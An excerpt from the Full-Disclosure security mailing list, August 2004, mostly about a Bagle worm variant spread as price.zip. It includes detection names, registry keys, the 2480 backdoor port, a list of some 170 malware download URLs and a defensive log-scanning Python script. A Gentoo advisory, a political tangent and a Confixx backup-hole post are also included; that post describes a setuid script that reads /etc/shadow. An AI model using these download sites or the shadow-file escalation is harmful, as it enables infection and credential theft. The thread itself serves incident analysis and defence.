(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? http://www.incidents.org/diary.php?date=2004-08-09 Scan results (http://www.virustotal.com) File: price.zip Date: 08/09/2004 21:41:30 BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Discovery Date : 8/10/2004 (PHL) Origin : USA Description ( updated : 8/9/2004 11:03:26 AM ) There are reports now in the USA of a malware spreading via email. The file, price.exe, is spread as a ZIP file, and is included in a supposedly manually-spammed email. This price.exe file is a downloader and attempts to download a file named 2.jpg from different sites. The sites are currently inaccessible at the time of this writing. Infected customers also report a file named as windll.exe running in the system. TrendLabs is still currently analyzing the files and will soon post a more detailed analysis. EPS Deliverables Pattern OPR 953 for WORM_BAGLE.AC - Pattern under QA Testing 8/9/2004 11:23:44 AM Thank you, Fooks, LynnBart Lansing Manager, Desktop Services Kohl's IT 262-703-2911 [EMAIL PROTECTED] wrote on 08/09/2004 02:03:54 PM: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200408-06 ] SpamAssassin: Denial of Service vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200408-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: SpamAssassin: Denial of Service vulnerability
      Date: August 09, 2004
      Bugs: #59483
        ID: 200408-06

Synopsis
========

SpamAssassin is vulnerable to a Denial of Service attack when handling
certain malformed messages.

Background
==========

SpamAssassin is an extensible email filter which is used to identify
spam.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  mail-filter/spamassassin      <= 2.63-r1                  >= 2.64

Description
===========

SpamAssassin contains an unspecified Denial of Service vulnerability.

Impact
======

By sending a specially crafted message an attacker could cause a Denial
of Service attack against the SpamAssassin service.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of SpamAssassin.

Resolution
==========

All SpamAssassin users should upgrade to the latest version:

    # emerge sync
    # emerge -pv ">=mail-filter/spamassassin-2.64"
    # emerge ">=mail-filter/spamassassin-2.64"

References
==========

  [ 1 ] SpamAssassin Release Announcement
        http://marc.theaimsgroup.com/?l=spamassassin-announce&m=109168121628767&w=2

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo
Security Website:

  http://security.gentoo.org/glsa/glsa-200408-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its
owner(s).

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBF9N1zKC5hMHO6rkRAjo2AJ9xHeR8k8af8/7TZAIGWepDzOUkLACfSutp
bq76MNaf0/5m8TfAiyfe5IY=
=ZqtN
-----END PGP SIGNATURE-----
Re: [Full-Disclosure] (no subject)
Kaspersky detect it as I-Worm.Bagle.al Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? I've seen several dozen of them today... getting pretty annoying. No other info, though. :| -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
F-Secure is reporting it as bangle.al. Looks like it's your basic email virus with a trojan backdoor. http://www.f-secure.com/v-descs/bagle_al.shtml Dave King, http://www.thesecure.net Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Todd, Thanks for the reply. It appears to be a new Beagle variant. http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_BAGLE.AC Jonathan Grotegut -Original Message- From: Todd Towles [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 1:32 PM To: Jonathan Grotegut; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut
Re: [Full-Disclosure] (no subject)
this Symantec Rapid Release beta will catch it for NAV users, until they roll-out the next official .def file: ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles [EMAIL PROTECTED] wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- -Micheal ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. From ClamAV Update list: Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web, 5043-web, 5044-web, 5045-web, 5046-web, 5047-web, 5048-web Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie Dussiaume, Roman Scheucher, Gunter Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip Corliss, Kevin Way Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender), JScript/IE.VM.Exploit (Inoculate) Alias: TR/RunMe.Dldr.1 (Hbedv) Added: Trojan.JS.RunMe Added: Trojan.RunMe Note: The name may change. Note: There are more submissions with this; at the moment I'm publishing just some of them. -Mike Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
I doubt many are infected on the list. Spoofed addresses culled from either the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything.
RE: [Full-Disclosure] (no subject)
I started seeing this earlier. No news from Norton that I can see. I'm trying to figure out what it does... Shannon Johnston On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Shannon Johnston [EMAIL PROTECTED] Cavion Plus signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
List of URLs embedded within a price.exe I received. -M. http://polobeer.de/2.jpg http://r2626r.de/2.jpg http://kooltokyo.ru/2.jpg http://mmag.ru/2.jpg http://advm1.gm.fh-koeln.de/2.jpg http://evadia.ru/2.jpg http://megion.ru/2.jpg http://molinero-berlin.de/2.jpg http://dozenten.f1.fhtw-berlin.de/2.jpg http://shadkhan.ru/2.jpg http://sacred.ru/2.jpg http://kypexin.ru/2.jpg http://www.gantke-net.com/2.jpg http://www.mcschnaeppchen.com/2.jpg http://www.rollenspielzirkel.de/2.jpg http://134.102.228.45/2.jpg http://196.12.49.27/2.jpg http://aus-Zeit.com/2.jpg http://lottery.h11.ru/2.jpg http://herzog.cs.uni-magdeburg.de/2.jpg http://yaguark.h10.ru/2.jpg http://213.188.129.72/2.jpg http://thorpedo.us/2.jpg http://szm.sk/2.jpg http://lars-s.privat.t-online.de/2.jpg http://www.no-abi2003.de/2.jpg http://www.mdmedia.org/2.jpg http://abi-2004.org/2.jpg http://sovea.de/2.jpg http://www.porta.de/2.jpg http://matzlinger.com/2.jpg http://pocono.ru/2.jpg http://controltechniques.ru/2.jpg http://alexey.pioneers.com.ru/2.jpg http://momentum.ru/2.jpg http://omegat.ru/2.jpg http://www.perfectgirls.net/2.jpg http://porno-mania.net/2.jpg http://colleen.ai.net/2.jpg http://ourcj.com/2.jpg http://free.bestialityhost.com/2.jpg http://slavarik.ru/2.jpg http://burn2k.ipupdater.com/2.jpg http://carabi.ru/2.jpg http://spbbook.ru/2.jpg http://binn.ru/2.jpg http://sbuilder.ru/2.jpg http://protek.ru/2.jpg http://www.PlayGround.ru/2.jpg http://celine.artics.ru/2.jpg http://www.artics.ru/2.jpg http://www.laserbuild.ru/2.jpg http://www.lamatec.com/2.jpg http://www.sensi.com/2.jpg http://www.oldtownradio.com/2.jpg http://www.youbuynow.com/2.jpg http://64.62.172.118/2.jpg http://www.tayles.com/2.jpg http://dodgetheatre.com/2.jpg http://www.thepositivesideofsports.com/2.jpg http://www.bridesinrussia.com/2.jpg http://fairy.dataforce.net/2.jpg http://www.pakwerk.ru/2.jpg http://home.profootball.ru/2.jpg http://www.ankil.ru/2.jpg http://www.ddosers.net/2.jpg http://tarkosale.net/2.jpg 
http://www.boglen.com/2.jpg http://change.east.ru/2.jpg http://www.teatr-estrada.ru/2.jpg http://www.glass-master.ru/2.jpg http://www.zeiss.ru/2.jpg http://www.sposob.ru/2.jpg http://www.glavriba.ru/2.jpg http://alfinternational.ru/2.jpg http://euroviolence.com/2.jpg http://www.webronet.com/2.jpg http://www.virtmemb.com/2.jpg http://www.infognt.com/2.jpg http://www.vivamedia.ru/2.jpg http://www.zelnet.ru/2.jpg http://www.dsmedia.ru/2.jpg http://www.vendex.ru/2.jpg http://www.elit-line.ru/2.jpg http://pixel.co.il/2.jpg http://www.milm.ru/2.jpg http://dev.tikls.net/2.jpg http://www.met.pl/2.jpg http://www.strefa.pl/2.jpg http://kafka.punkt.pl/2.jpg http://www.rubikon.pl/2.jpg http://www.neostrada.pl/2.jpg http://werel1.web-gratis.net/2.jpg http://www.tuhart.net/2.jpg http://www.antykoncepcja.net/2.jpg http://www.dami.com.pl/2.jpg http://vip.pnet.pl/2.jpg http://www.webzdarma.cz/2.jpg http://emnesty.w.interia.pl/2.jpg http://niebo.net/2.jpg http://strony.wp.pl/2.jpg http://sec.polbox.pl/2.jpg http://www.phg.pl/2.jpg http://emnezz.e-mania.pl/2.jpg http://www.republika.pl/2.jpg http://www.silesianet.pl/2.jpg http://www.republika.pl/2.jpg http://tdi-router.opola.pl/2.jpg http://republika.pl/2.jpg http://infokom.pl/2.jpg http://silesianet.pl/2.jpg http://terramail.pl/2.jpg http://silesianet.pl/2.jpg http://www.iluminati.kicks-ass.net/2.jpg http://www.dilver.ru/2.jpg http://www.yarcity.ru/2.jpg http://www.scli.ru/2.jpg http://www.elemental.ru/2.jpg http://diablo.homelinux.com/2.jpg http://www.interrybflot.ru/2.jpg http://www.webpark.pl/2.jpg http://www.rafani.cz/2.jpg http://gutemine.wu-wien.ac.at/2.jpg http://przeglad-tygodnik.pl/2.jpg http://przeglad-tygodnik.pl/2.jpg http://pb195.slupsk.sdi.tpnet.pl/2.jpg http://www.ciachoo.pl/2.jpg http://cavalierland.5u.com/2.jpg http://www.nefkom.net/2.jpg http://rausis.latnet.lv/2.jpg http://www.hgr.de/2.jpg http://www.airnav.com/2.jpg http://www.astoria-stuttgart.de/2.jpg http://ultimate-best-hgh.0my.net/2.jpg 
http://wynnsjammer.proboards18.com/2.jpg http://www.jewishgen.org/2.jpg http://www.hack-gegen-rechts.com/2.jpg http://host.wallstreetcity.com/2.jpg http://quotes.barchart.com/2.jpg http://www.aannemers-nederland.nl/2.jpg http://www.sjgreatdeals.com/2.jpg http://financial.washingtonpost.com/2.jpg http://www.biratnagarmun.org.np/2.jpg http://hsr.zhp.org.pl/2.jpg http://traveldeals.sidestep.com/2.jpg http://www.hbz-nrw.de/2.jpg http://www.ifa-guide.co.uk/2.jpg http://www.inversorlatino.com/2.jpg http://www.zhp.gdynia.pl/2.jpg http://host.businessweek.com/2.jpg http://packages.debian.or.jp/2.jpg http://www.math.kobe-u.ac.jp/2.jpg http://www.k2kapital.com/2.jpg http://www.tanzen-in-sh.de/2.jpg http://www.wapf.com/2.jpg http://www.hgrstrailer.com/2.jpg http://www.forbes.com/2.jpg http://www.oshweb.com/2.jpg http://www.rumbgeo.ru/2.jpg http://www.dicto.ru/2.jpg http://www.busheron.ru/2.jpg http://www.omnicom.ru/2.jpg http://www.teleline.ru/2.jpg http://www.dynex.ru/2.jpg http://www.gamma.vyborg.ru/2.jpg
RE: [Full-Disclosure] (no subject)
It appears to be what TrendMicro calls Beagle.AC - IDE released at 2:30pm Maybe it is dropping an older Trojan. -Original Message- From: Paul Szabo [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:06 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] (no subject) Anyone have any idea what this is ... F-PROT ANTIVIRUS Program version: 4.4.2 Engine version: 3.14.11 VIRUS SIGNATURE FILES SIGN.DEF created 9 August 2004 SIGN2.DEF created 9 August 2004 MACRO.DEF created 10 May 2004 message-new__price.zip-price.html Infection: HTML/[EMAIL PROTECTED] message-new__price.zip-price/price.exe is a dropper for W32/Mitglieder.W Cheers, Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia
Re: [Full-Disclosure] (no subject)
Symantec identifies this as [EMAIL PROTECTED] -Bob Kehr Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Sent: Monday, August 09, 2004 3:25 PM To: Jonathan Grotegut Cc: Full-disclosure Subject: Re: [Full-Disclosure] (no subject) List of URLs embedded within a price.exe i recieved. -M. snip All of this is located on the SANS Internet Storm Center site. Bernard linked to it in his response. http://www.incidents.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
Well, that is what I meant. People that have people from FD are infected. Sorry, typed that up fast when I was working on something else. -Original Message- From: Ron DuFresne [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:40 PM To: Todd Towles Cc: 'Jonathan Grotegut'; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many... I doubt many are infected on the list. Spoofed addresses culled from either the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything.
[Full-Disclosure] New Bagle variant
The worm itself is packed with PeX, uses its own SMTP engine and contains a Mitglieder-like downloader. It also opens a backdoor using TCP and UDP port 2480 on the compromised machine. The virus will transmit over SMTP, P2P and SMB. The following reg keys will be present: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\win_upd2. exe = %System%\WINdirect.exe HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\erthgdr = %System%\windll.exe HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru1n The zip file contains non-functional code to password protect the zip. It will attempt to send itself to email addresses it gathers from the system from files with the following extensions on the compromised system: .adb .asp .cfg .cgi .dbx .dhtm .eml .htm .jsp .mbx .mdx .mht .mmf .msg .nch .ods .oft .php .pl .sht .shtm .stm .tbb .txt .uin .wab .wsh .xls .xml -- Tremaine IT Security Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
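An added detection example, not code from any poster in this thread and not a vendor signature: it turns three indicators quoted in the thread into checks over log lines. The indicators are the root-level 2.jpg fetch from the URL list Michael posted (the hostnames polobeer.de and mmag.ru below come from that list), the TCP/UDP 2480 backdoor and the worm's own SMTP engine from the post above. The proxy and firewall log formats, the relay address 10.0.0.5 and every sample line are constructed for the demo; adapt the two regexes to whatever your proxy and firewall actually emit.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit

# Indicators gathered from this thread (assumptions marked as such):
#  - the dropper (price.exe) fetches a file called /2.jpg from many hosts;
#  - the installed component opens a backdoor on TCP and UDP port 2480;
#  - the worm mails itself with its own SMTP engine, so infected
#    workstations talk SMTP directly to outside hosts.
DOWNLOAD_PATH = "/2.jpg"
BACKDOOR_PORT = 2480
SMTP_PORT = 25
# Assumed site policy: the only host allowed to speak SMTP to the outside.
MAIL_RELAYS = {"10.0.0.5"}

Alert = namedtuple("Alert", "line reason")

# Assumed log formats, loosely modelled on a proxy access log and an
# iptables-style connection log. Not real captures.
PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<method>[A-Z]+) "
    r"(?P<url>\S+) (?P<status>\d{3})$")
FW_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) (?P<proto>TCP|UDP) "
    r"(?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)$")


def check_proxy_line(line):
    """Flag any request for exactly /2.jpg, whatever the host and whatever the
    status: a 404 still means an infected client is trying (the thread notes
    the download sites were already unreachable)."""
    m = PROXY_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    if url.path.lower() == DOWNLOAD_PATH:
        return Alert(line, f"{m.group('src')} fetched {DOWNLOAD_PATH} from "
                           f"{url.hostname} (Bagle downloader)")
    return None


def check_firewall_line(line):
    """Flag traffic to the 2480 backdoor port and SMTP from non-relay hosts."""
    m = FW_RE.match(line)
    if not m:
        return None
    dport = int(m.group("dport"))
    if dport == BACKDOOR_PORT:
        return Alert(line, f"{m.group('proto')}/{BACKDOOR_PORT} to {m.group('dst')} "
                           f"(Bagle backdoor port)")
    if dport == SMTP_PORT and m.group("src") not in MAIL_RELAYS:
        return Alert(line, f"direct SMTP from non-relay {m.group('src')} "
                           f"(worm's own SMTP engine?)")
    return None


def scan(lines):
    """Run both checks over an iterable of log lines; returns the alerts in order."""
    alerts = []
    for line in lines:
        line = line.rstrip("\n")
        alert = check_proxy_line(line) or check_firewall_line(line)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample log, not a real capture.
SAMPLE_LOG = [
    "2004-08-09T14:05:11 10.0.0.23 GET http://polobeer.de/2.jpg 200",
    "2004-08-09T14:05:12 10.0.0.23 GET http://www.example.org/images/2.jpg 200",
    "2004-08-09T14:06:01 10.0.0.42 GET http://mmag.ru/2.jpg 404",
    "2004-08-09T14:07:30 ACCEPT TCP 192.0.2.10:51234 -> 10.0.0.23:2480",
    "2004-08-09T14:07:31 ACCEPT UDP 192.0.2.10:51235 -> 10.0.0.23:2480",
    "2004-08-09T14:08:00 ACCEPT TCP 10.0.0.23:40000 -> 198.51.100.7:25",
    "2004-08-09T14:08:05 ACCEPT TCP 10.0.0.5:40001 -> 198.51.100.7:25",
    "2004-08-09T14:08:10 10.0.0.23 GET http://www.example.org/index.html 200",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a.reason, "<-", a.line)
```

The path match is deliberately exact (`/2.jpg` at the root), so an ordinary image at a deeper path is not flagged; loosen it to the file name if your proxy sees the downloader behind a redirector. The SMTP rule is the most generally useful of the three: a workstation opening port 25 to an outside address is suspect for any mass mailer, not just this one.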
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1825 - 31 msgs
*English* You have sent an e-mail to [EMAIL PROTECTED]. This e-mail address is no longer in use. Please delete the address from your address book! / Patrik *Swedish (translated)* You have sent a mail to [EMAIL PROTECTED]. This address is no longer in use. Please delete the address from your address book. / Patrik Best reg. Patrik Torin E-mail. [EMAIL PROTECTED] Website. http://www.geocities.com/ptorin/
Re: [Full-Disclosure] (no subject)
On Mon, 09 Aug 2004 16:07:02 -0400 Michael Erdely [EMAIL PROTECTED] wrote: ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. .. -Mike ClamAV has problems filtering the HTML e-mails. I received about 4 infected mails even though clamscan/clamd know the virus. clamscan identifies the virus without problems if I scan the attachment saved to the HDD... vh pgpMgM6O7ZChW.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote: BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine... Makes for a nice game of AV bingo though... -Frank signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
Security List wrote: Appointed? If you do not believe in the U.S. constitution and the supreme court then I could see how one might suggest that Mr. Bush was appointed. If you do believe in it then you must know that his appointment was the only legal solution to the issue. Many major papers investigated the vote counting in FL and they all concluded that Mr. Bush did win if the votes were counted correctly. Never mind the thousands of military votes the Dems had thrown out which were legal. Come on people. Do your research if you are going to try and make a point. To bring this back to a security issue, your statement hinges on your operational definition of "counted correctly". I can guarantee you that many informed people are going to disagree with your personal operational definition of "counted correctly". So, the key here is what is the baseline for counting and verifying votes? This is the single largest issue with touch-screen voting and the security of modern elections: verifying the integrity and authenticity of the vote. Many of the so-called legal military votes were given to the soldiers already filled out. Some (a significant portion) did not have the valid authentication requirements (SSN, full name, etc). Some soldiers reported that absentee ballots were never actually sent by them, but rather filled out by commanders and sent unsigned. The litmus test for verification is always the completion of the shared secret, whatever form that takes. A properly functional login system doesn't say "well, the person may not have put in their password, but I'll let them in anyway!". That's a sign of a flawed system. And if this were not a controversial subject that most people can't separate emotion from logic on, you'd agree with me on this. There are terrible flaws in the electoral system and these issues have to be validly addressed. These issues will continue to shed doubt on elections, regardless of the outcome. -Barry
Re: [Full-Disclosure] Security hole in Confixx backup script
What if someone creates a shell script that simply cats /etc/shadow and sets the SetUID flag. Then he makes a backup of that file and restores the backup while he prevents the chown command anyhow. All files will remain root, including the script. The execution of this script will print out the shadowed encrypted passwords. This can even be used to chmod the shadow file and make it readable for everyone.

On Monday 09 August 2004 19:17, Dirk Pirschel wrote:

> Hi,
>
> * Dirk Pirschel wrote on Mon, 02 Aug 2004 at 13:00 +0200:
>
